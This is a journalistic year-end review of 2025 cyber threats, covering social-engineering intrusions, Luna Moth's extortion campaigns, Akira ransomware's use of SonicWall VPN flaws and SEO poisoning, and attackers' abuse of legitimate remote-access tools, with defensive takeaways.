Cybersecurity in 2025: When Defenders Protected Systems—and Attackers Exploited People

As the cybersecurity industry closes the books on 2025, the year is already solidifying around a familiar but unsettling conclusion: attackers didn’t need radically new malware to cause outsized damage. They needed people, timing, and a growing catalog of quietly catastrophic infrastructure flaws.

That’s the throughline emerging from a year-end review by incident response specialists at LevelBlue, which absorbed digital forensics heavyweight Stroz Friedberg earlier this year. Their findings trace a threat landscape increasingly defined by impersonation, abuse of legitimate tools, and the systematic exploitation of network gateways that sit at the heart of modern enterprise connectivity.

Rather than relying on noisy exploits or exotic zero-days alone, 2025’s most active threat actors blended social engineering with reliable access points: VPNs, firewalls, remote support software, and trusted collaboration tools. The result was a year in which defenders often discovered breaches only after data had already walked out the door—or ransomware had detonated deep inside the network.

Social Engineering Grows Teeth

One of the clearest patterns to emerge was the maturation of social engineering from a supporting tactic into the primary access vector. Threat actors increasingly impersonated internal IT staff, abused trusted communication channels, and leveraged legitimate remote access software to move laterally without triggering alarms.

In some cases, attackers went further—recruiting or placing individuals into IT roles inside target organizations, effectively bypassing technical controls altogether. These human-centric intrusions proved especially effective against professional services firms, where responsiveness and trust are operational necessities.

This shift marked a broader evolution: attackers no longer needed to defeat security stacks head-on. They simply convinced users to invite them inside.

Luna Moth and the Rise of Data-First Extortion

Among the most disruptive actors this year was the Luna Moth group, whose campaigns focused less on encryption and more on coercion. Their playbook typically began with phishing messages that appeared to come from internal IT teams, directing victims to call a fake helpdesk.

Once contact was made, attackers persuaded users to install legitimate remote access tools—often Zoho Assist or Atera—then pivoted immediately to data exfiltration using tools like WinSCP or renamed Rclone binaries. Only after sensitive files were in hand did the extortion begin, often through relentless calls and emails designed to apply psychological pressure rather than technical force.

For defenders, the lesson was stark: by the time alerts fired, the damage was already done.

Akira’s Infrastructure-Driven Momentum

If Luna Moth highlighted the human attack surface, Akira underscored the fragility of perimeter infrastructure. Throughout 2025, Akira affiliates were observed at a higher frequency than nearly any other ransomware group, driven largely by their success exploiting VPN and firewall vulnerabilities.

Two flaws in particular stood out—both affecting SonicWall firewalls. One stemmed from improper access controls introduced during firewall migrations, while another allowed attackers to hijack active VPN sessions outright. In both cases, authentication barriers—including MFA—were rendered irrelevant.

Akira also leaned heavily on SEO poisoning, redirecting users to spoofed download sites hosting trojanized installers for legitimate IT utilities. Once executed, these installers deployed the Bumblebee loader, enabling rapid lateral movement, credential theft, and ultimately ransomware deployment.

The pattern was consistent: a single trusted action—updating a tool, logging into a VPN—could cascade into full-scale compromise.

When Help Desks Become Attack Surfaces

Another notable escalation involved abuse of Microsoft Quick Assist and Teams. Attackers initiated voice calls or Teams messages from compromised external accounts, sometimes preceded by email bombing to create urgency. Victims were then guided to launch Quick Assist and share access—handing attackers the same privileges as the logged-in user.

From there, post-compromise activity followed a disciplined script: reconnaissance, credential harvesting, reverse SSH tunneling, persistence via scheduled tasks and registry changes, and deployment of additional remote access tools like AnyDesk or ScreenConnect. In at least one case, the intrusion culminated in ransomware deployment using PsExec.

Because every tool involved was legitimate, traditional EDR systems often saw nothing more than routine administrative behavior.

Vulnerabilities That Defined the Year

While social engineering dominated headlines, infrastructure vulnerabilities remained the accelerant. Firewalls, VPN gateways, and enterprise middleware accounted for a disproportionate share of successful intrusions.

Beyond SonicWall, attackers actively exploited flaws in Fortinet devices, Ivanti Connect Secure VPNs, and SAP NetWeaver—often chaining authentication bypasses with remote code execution to establish persistent control. Several of these bugs enabled full administrative access without credentials, allowing attackers to disable defenses, deploy web shells, and erase forensic evidence.

The common thread: intermediary systems that sit between users and data, often exposed to the internet and patched too slowly to keep pace with exploitation.

Living Off the Land, Living in the Noise

Across nearly every major incident, attackers favored “living off the land” techniques—abusing built-in Windows utilities, standard file transfer tools, and widely used remote support software. By blending into normal IT operations, they reduced their detection footprint while increasing dwell time.

In many environments, the most heavily used attacker tools were indistinguishable from those used by administrators every day.

A Human-Centered Future

As 2026 approaches, the implications are uncomfortable but clear. Phishing emails and zero-days aren’t disappearing—but they’re being eclipsed by impersonation, trust abuse, and behavioral manipulation that bypass technical safeguards entirely.

The defenses that mattered most in 2025 weren’t signature updates or heuristic detections. They were controls that understood context: who should be doing what, when, and why. Without that behavioral awareness, organizations found themselves blind to attackers who never looked like intruders at all.

If 2025 proved anything, it’s that the weakest link in cybersecurity isn’t a single product or patch cycle—it’s the space where humans, tools, and trust intersect.